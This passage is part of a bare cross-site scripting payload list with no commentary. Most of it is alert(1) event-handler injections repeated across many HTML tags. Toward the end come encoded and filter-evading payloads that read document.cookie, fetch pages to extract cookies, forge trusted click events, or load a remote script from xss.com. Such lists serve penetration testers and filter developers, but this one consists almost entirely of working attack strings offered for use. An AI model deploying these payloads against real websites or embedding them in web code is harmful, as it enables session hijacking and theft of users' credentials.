ondblclick="alert(1)">test</track> <track onfocusout=alert(1) tabindex=1 id=x></track><input autofocus> <track onkeydown="alert(1)" contenteditable>test</track> <track onkeypress="alert(1)" contenteditable>test</track> <track onkeyup="alert(1)" contenteditable>test</track> <track onmousedown="alert(1)">test</track> <track onmouseenter="alert(1)">test</track> <track onmouseleave="alert(1)">test</track> <track onmousemove="alert(1)">test</track> <track onmouseout="alert(1)">test</track> <track onmouseover="alert(1)">test</track> <track onmouseup="alert(1)">test</track> <track onpaste="alert(1)" contenteditable>test</track> <tt draggable="true" ondrag="alert(1)">test</tt> <tt draggable="true" ondragend="alert(1)">test</tt> <tt draggable="true" ondragenter="alert(1)">test</tt> <tt draggable="true" ondragleave="alert(1)">test</tt> <tt draggable="true" ondragstart="alert(1)">test</tt> <tt id=x tabindex=1 onactivate=alert(1)></tt> <tt id=x tabindex=1 onbeforeactivate=alert(1)></tt> <tt id=x tabindex=1 onbeforedeactivate=alert(1)></tt><input autofocus> <tt id=x tabindex=1 ondeactivate=alert(1)></tt><input id=y autofocus> <tt id=x tabindex=1 onfocus=alert(1)></tt> <tt id=x tabindex=1 onfocusin=alert(1)></tt> <tt onbeforecopy="alert(1)" contenteditable>test</tt> <tt onbeforecut="alert(1)" contenteditable>test</tt> <tt onbeforepaste="alert(1)" contenteditable>test</tt> <tt onblur=alert(1) tabindex=1 id=x></tt><input autofocus> <tt onclick="alert(1)">test</tt> <tt oncontextmenu="alert(1)">test</tt> <tt oncopy="alert(1)" contenteditable>test</tt> <tt oncut="alert(1)" contenteditable>test</tt> <tt ondblclick="alert(1)">test</tt> <tt onfocusout=alert(1) tabindex=1 id=x></tt><input autofocus> <tt onkeydown="alert(1)" contenteditable>test</tt> <tt onkeypress="alert(1)" contenteditable>test</tt> <tt onkeyup="alert(1)" contenteditable>test</tt> <tt onmousedown="alert(1)">test</tt> <tt onmouseenter="alert(1)">test</tt> <tt onmouseleave="alert(1)">test</tt> <tt onmousemove="alert(1)">test</tt> <tt onmouseout="alert(1)">test</tt> <tt onmouseover="alert(1)">test</tt> <tt onmouseup="alert(1)">test</tt> <tt onpaste="alert(1)" contenteditable>test</tt> <u draggable="true" ondrag="alert(1)">test</u> <u draggable="true" ondragend="alert(1)">test</u> <u draggable="true" ondragenter="alert(1)">test</u> <u draggable="true" ondragleave="alert(1)">test</u> <u draggable="true" ondragstart="alert(1)">test</u> <u id=x tabindex=1 onactivate=alert(1)></u> <u id=x tabindex=1 onbeforeactivate=alert(1)></u> <u id=x tabindex=1 onbeforedeactivate=alert(1)></u><input autofocus> <u id=x tabindex=1 ondeactivate=alert(1)></u><input id=y autofocus> <u id=x tabindex=1 onfocus=alert(1)></u> <u id=x tabindex=1 onfocusin=alert(1)></u> <u onbeforecopy="alert(1)" contenteditable>test</u> <u onbeforecut="alert(1)" contenteditable>test</u> <u onbeforepaste="alert(1)" contenteditable>test</u> <u onblur=alert(1) tabindex=1 id=x></u><input autofocus> <u onclick="alert(1)">test</u> <u oncontextmenu="alert(1)">test</u> <u oncopy="alert(1)" contenteditable>test</u> <u oncut="alert(1)" contenteditable>test</u> <u ondblclick="alert(1)">test</u> <u onfocusout=alert(1) tabindex=1 id=x></u><input autofocus> <u onkeydown="alert(1)" contenteditable>test</u> <u onkeypress="alert(1)" contenteditable>test</u> <u onkeyup="alert(1)" contenteditable>test</u> <u onmousedown="alert(1)">test</u> <u onmouseenter="alert(1)">test</u> <u onmouseleave="alert(1)">test</u> <u onmousemove="alert(1)">test</u> <u onmouseout="alert(1)">test</u> <u onmouseover="alert(1)">test</u> <u onmouseup="alert(1)">test</u> <u onpaste="alert(1)" contenteditable>test</u> <ul draggable="true" ondrag="alert(1)">test</ul> <ul draggable="true" ondragend="alert(1)">test</ul> <ul draggable="true" ondragenter="alert(1)">test</ul> <ul draggable="true" ondragleave="alert(1)">test</ul> <ul draggable="true" ondragstart="alert(1)">test</ul> <ul id=x tabindex=1 onactivate=alert(1)></ul> <ul id=x tabindex=1 onbeforeactivate=alert(1)></ul> <ul id=x tabindex=1 onbeforedeactivate=alert(1)></ul><input autofocus> <ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus> <ul id=x tabindex=1 onfocus=alert(1)></ul> <ul id=x tabindex=1 onfocusin=alert(1)></ul> <ul onbeforecopy="alert(1)" contenteditable>test</ul> <ul onbeforecut="alert(1)" contenteditable>test</ul> <ul onbeforepaste="alert(1)" contenteditable>test</ul> <ul onblur=alert(1) tabindex=1 id=x></ul><input autofocus> <ul onclick="alert(1)">test</ul> <ul oncontextmenu="alert(1)">test</ul> <ul oncopy="alert(1)" contenteditable>test</ul> <ul oncut="alert(1)" contenteditable>test</ul> <ul ondblclick="alert(1)">test</ul> <ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus> <ul onkeydown="alert(1)" contenteditable>test</ul> <ul onkeypress="alert(1)" contenteditable>test</ul> <ul onkeyup="alert(1)" contenteditable>test</ul> <ul onmousedown="alert(1)">test</ul> <ul onmouseenter="alert(1)">test</ul> <ul onmouseleave="alert(1)">test</ul> <ul onmousemove="alert(1)">test</ul> <ul onmouseout="alert(1)">test</ul> <ul onmouseover="alert(1)">test</ul> <ul onmouseup="alert(1)">test</ul> <ul onpaste="alert(1)" contenteditable>test</ul> <var draggable="true" ondrag="alert(1)">test</var> <var draggable="true" ondragend="alert(1)">test</var> <var draggable="true" ondragenter="alert(1)">test</var> <var draggable="true" ondragleave="alert(1)">test</var> <var draggable="true" ondragstart="alert(1)">test</var> <var id=x tabindex=1 onactivate=alert(1)></var> <var id=x tabindex=1 onbeforeactivate=alert(1)></var> <var id=x tabindex=1 onbeforedeactivate=alert(1)></var><input autofocus> <var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus> <var id=x tabindex=1 onfocus=alert(1)></var> <var id=x tabindex=1 onfocusin=alert(1)></var> <var onbeforecopy="alert(1)" contenteditable>test</var> <var onbeforecut="alert(1)" contenteditable>test</var> <var onbeforepaste="alert(1)" contenteditable>test</var> <var onblur=alert(1) tabindex=1 id=x></var><input autofocus> <var onclick="alert(1)">test</var> <var oncontextmenu="alert(1)">test</var> <var oncopy="alert(1)" contenteditable>test</var> <var oncut="alert(1)" contenteditable>test</var> <var ondblclick="alert(1)">test</var> <var onfocusout=alert(1) tabindex=1 id=x></var><input autofocus> <var onkeydown="alert(1)" contenteditable>test</var> <var onkeypress="alert(1)" contenteditable>test</var> <var onkeyup="alert(1)" contenteditable>test</var> <var onmousedown="alert(1)">test</var> <var onmouseenter="alert(1)">test</var> <var onmouseleave="alert(1)">test</var> <var onmousemove="alert(1)">test</var> <var onmouseout="alert(1)">test</var> <var onmouseover="alert(1)">test</var> <var onmouseup="alert(1)">test</var> <var onpaste="alert(1)" contenteditable>test</var> <video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video autoplay controls onseeked=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video> <video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video> <video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video controls autoplay ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video draggable="true" ondrag="alert(1)">test</video> <video draggable="true" ondragend="alert(1)">test</video> <video draggable="true" ondragenter="alert(1)">test</video> <video draggable="true" ondragleave="alert(1)">test</video> <video draggable="true" ondragstart="alert(1)">test</video> <video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video> <video id=x controls onfocusin=alert(1)><source src="validvideo.mp4" type=video/mp4></video> <video id=x tabindex=1 onactivate=alert(1)></video> <video id=x tabindex=1 onbeforeactivate=alert(1)></video> <video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus> <video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus> <video onbeforecopy="alert(1)" contenteditable>test</video> <video onbeforecut="alert(1)" contenteditable>test</video> <video onbeforepaste="alert(1)" contenteditable>test</video> <video onblur=alert(1) tabindex=1 id=x></video><input autofocus> <video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video onclick="alert(1)">test</video> <video oncontextmenu="alert(1)">test</video> <video oncopy="alert(1)" contenteditable>test</video> <video oncut="alert(1)" contenteditable>test</video> <video ondblclick="alert(1)">test</video> <video onfocusout=alert(1) tabindex=1 id=x></video><input autofocus> <video onkeydown="alert(1)" contenteditable>test</video> <video onkeypress="alert(1)" contenteditable>test</video> <video onkeyup="alert(1)" contenteditable>test</video> <video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> <video onmousedown="alert(1)">test</video> <video onmouseenter="alert(1)">test</video> <video onmouseleave="alert(1)">test</video> <video onmousemove="alert(1)">test</video> <video onmouseout="alert(1)">test</video> <video onmouseover="alert(1)">test</video> <video onmouseup="alert(1)">test</video> <video onpaste="alert(1)" contenteditable>test</video> <video src/onerror=alert(1)> <video><source onerror=alert(1) src=1></video> <video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video> <wbr draggable="true" ondrag="alert(1)">test</wbr> <wbr draggable="true" ondragend="alert(1)">test</wbr> <wbr draggable="true" ondragenter="alert(1)">test</wbr> <wbr draggable="true" ondragleave="alert(1)">test</wbr> <wbr draggable="true" ondragstart="alert(1)">test</wbr> <wbr id=x tabindex=1 onactivate=alert(1)></wbr> <wbr id=x tabindex=1 onbeforeactivate=alert(1)></wbr> <wbr id=x tabindex=1 onbeforedeactivate=alert(1)></wbr><input autofocus> <wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus> <wbr id=x tabindex=1 onfocus=alert(1)></wbr> <wbr id=x tabindex=1 onfocusin=alert(1)></wbr> <wbr onbeforecopy="alert(1)" contenteditable>test</wbr> <wbr onbeforecut="alert(1)" contenteditable>test</wbr> <wbr onbeforepaste="alert(1)" contenteditable>test</wbr> <wbr onblur=alert(1) tabindex=1 id=x></wbr><input autofocus> <wbr onclick="alert(1)">test</wbr> <wbr oncontextmenu="alert(1)">test</wbr> <wbr oncopy="alert(1)" contenteditable>test</wbr> <wbr oncut="alert(1)" contenteditable>test</wbr> <wbr ondblclick="alert(1)">test</wbr> <wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus> <wbr onkeydown="alert(1)" contenteditable>test</wbr> <wbr onkeypress="alert(1)" contenteditable>test</wbr> <wbr onkeyup="alert(1)" contenteditable>test</wbr> <wbr onmousedown="alert(1)">test</wbr> <wbr onmouseenter="alert(1)">test</wbr> <wbr onmouseleave="alert(1)">test</wbr> <wbr onmousemove="alert(1)">test</wbr> <wbr onmouseout="alert(1)">test</wbr> <wbr onmouseover="alert(1)">test</wbr> <wbr onmouseup="alert(1)">test</wbr> <wbr onpaste="alert(1)" contenteditable>test</wbr> <xmp draggable="true" ondrag="alert(1)">test</xmp> <xmp draggable="true" ondragend="alert(1)">test</xmp> <xmp draggable="true" ondragenter="alert(1)">test</xmp> <xmp draggable="true" ondragleave="alert(1)">test</xmp> <xmp draggable="true" ondragstart="alert(1)">test</xmp> <xmp id=x tabindex=1 onactivate=alert(1)></xmp> <xmp id=x tabindex=1 onbeforeactivate=alert(1)></xmp> <xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus> <xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><input id=y autofocus> <xmp id=x tabindex=1 onfocus=alert(1)></xmp> <xmp id=x tabindex=1 onfocusin=alert(1)></xmp> <xmp onbeforecopy="alert(1)" contenteditable>test</xmp> <xmp onbeforecut="alert(1)" contenteditable>test</xmp> <xmp onbeforepaste="alert(1)" contenteditable>test</xmp> <xmp onblur=alert(1) tabindex=1 id=x></xmp><input autofocus> <xmp onclick="alert(1)">test</xmp> <xmp oncontextmenu="alert(1)">test</xmp> <xmp oncopy="alert(1)" contenteditable>test</xmp> <xmp oncut="alert(1)" contenteditable>test</xmp> <xmp ondblclick="alert(1)">test</xmp> <xmp onfocusout=alert(1) tabindex=1 id=x></xmp><input autofocus> <xmp onkeydown="alert(1)" contenteditable>test</xmp> <xmp onkeypress="alert(1)" contenteditable>test</xmp> <xmp onkeyup="alert(1)" contenteditable>test</xmp> <xmp onmousedown="alert(1)">test</xmp> <xmp onmouseenter="alert(1)">test</xmp> <xmp onmouseleave="alert(1)">test</xmp> <xmp onmousemove="alert(1)">test</xmp> <xmp onmouseout="alert(1)">test</xmp> <xmp onmouseover="alert(1)">test</xmp> <xmp onmouseup="alert(1)">test</xmp> <xmp onpaste="alert(1)" contenteditable>test</xmp> <xss id=x tabindex=1 onactivate=alert(1)></xss> <xss id=x tabindex=1 onbeforeactivate=alert(1)></xss> <xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus> <xss id=x tabindex=1 onblur=alert(1)></xss><input autofocus> <xss id=x tabindex=1 ondeactivate=alert(1)></xss><input autofocus> <xss id=x tabindex=1 onfocus=alert(1)></xss> <xss id=x tabindex=1 onfocusin=alert(1)></xss> <xss id=x tabindex=1 onfocusout=alert(1)></xss><input autofocus> '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E <<scr\0ipt/src=http://xss.com/xss.js></script %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E ' onmouseover=alert(/XSS/) "><iframe%20src="http://google.com"%%203E '<script>window.onload=function(){document.forms[0].message.value='1';}</script> x”</title><img src%3dx onerror%3dalert(1)> <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> <script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> <script>alert(document.head.innerHTML.substr(146,20));</script> <script>alert(document.head.childNodes[3].text)</script> <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> <script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> <script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 <script for=document event=onreadystatechange>getElementById('safe123').click()</script> <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> <object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> <a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? <var onmouseover="prompt(1)">On Mouse Over</var>? <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=``<div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe 